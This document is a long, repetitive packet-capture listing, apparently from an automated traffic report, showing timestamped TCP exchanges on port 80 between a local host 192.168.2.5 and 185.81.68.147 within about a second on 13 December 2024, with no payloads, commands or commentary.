                                                                                                                                                                Dec 13, 2024 01:37:12.615508080 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.615551949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.616399050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.616449118 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.616493940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.617271900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.617322922 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.617398977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.618232012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.618283033 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.618290901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.619112968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.619163036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.619209051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.620021105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.620070934 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.620141029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.620939970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.620990992 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.621020079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.621828079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.621879101 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.621943951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.622749090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.622812986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.622844934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.623658895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.623713970 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.623754025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.624567986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.624641895 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.624682903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.625475883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.625529051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.625575066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.626418114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.626471043 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.626499891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.627320051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.627372026 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.627434969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.628264904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.628315926 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.628665924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.629137993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.629187107 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.629232883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.630029917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.630085945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.630116940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.630937099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.631047010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.631114006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.631854057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.631906033 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.631974936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.632774115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.632891893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.632961988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.633657932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.633708954 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.633760929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.634582043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.634684086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.634753942 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.635490894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.635549068 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.635643959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.636409044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.636487961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.636554956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.637306929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.637409925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.637474060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.638216972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.638281107 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.638322115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.639115095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.639235973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.639322042 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.640043020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.640103102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.640142918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.640965939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.641082048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.641169071 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.641854048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.641917944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.641957998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.642755032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.642863989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.642945051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.643659115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.643728971 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.643774033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.644573927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.644691944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.644768953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.645474911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.645591021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.645677090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.646488905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.646578074 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.646594048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.647299051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.647454023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.647521019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.648227930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.648274899 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.648300886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.649139881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.649250984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.649313927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.650029898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.650079012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.650125027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.650965929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.651046038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.651108980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.796081066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.796144962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.796220064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.796518087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.796601057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.796698093 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.797400951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.797548056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.798012972 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.798299074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.798427105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.798496962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.799206018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.799338102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.800137997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.800204039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.800250053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.800318003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.801139116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.801261902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.801333904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.801956892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.802093983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.802170992 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.802844048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.802947998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.803015947 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.803760052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.803881884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.803946972 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.804665089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.804691076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.805469036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.805557966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.805640936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.805963039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.806466103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.806602955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.806658983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.807406902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.807492018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.807570934 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.808317900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.808460951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.808526039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.809225082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.809331894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.809412003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.810110092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.810224056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.811093092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.811158895 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.811197042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.811263084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.811971903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.812094927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.812196970 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.812855959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.812962055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.813028097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.813767910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.813873053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.814383030 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.814663887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.814793110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.814850092 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.815645933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.815766096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.815820932 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.816500902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.816606998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.816669941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.817399025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.817552090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.817629099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.818317890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.818454981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.819221020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.819282055 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.819334984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.819397926 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.820132017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.820249081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.820739031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.821047068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.821180105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.821244955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.821939945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.822036028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.822094917 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.822880983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.822987080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.823071957 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.823776007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.823903084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.824270010 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.824712038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.824816942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.824872971 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.825593948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.825720072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.825773001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.826497078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.826628923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.826721907 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.827423096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.827521086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.827578068 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.828337908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.828459978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.828516960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.829232931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.829358101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.829408884 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.830126047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.830250978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.830307961 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.831054926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.831182957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.831242085 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.831964016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.832086086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.832145929 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.832866907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.832977057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.833029032 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.833762884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.833894968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.833950996 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.834676027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.834804058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.834856987 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.835581064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.835690975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.835750103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.836508036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.836620092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.836683035 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.837415934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.837531090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.837590933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.838315964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.838450909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.838504076 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.839226961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.839364052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.839421034 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.840136051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.840250015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.840310097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.841116905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.841206074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.841286898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.841986895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.842104912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.842158079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.842928886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.843019009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.843074083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.843739986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.895307064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.987863064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.987941980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.988027096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.988276958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.988503933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.988549948 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.988594055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.989382982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.989444017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.989474058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.990299940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.990345955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.990411997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.991200924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.991242886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.991309881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.992104053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.992146969 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.992178917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.993010044 CET8049707185.81.68.147192.168.2.5
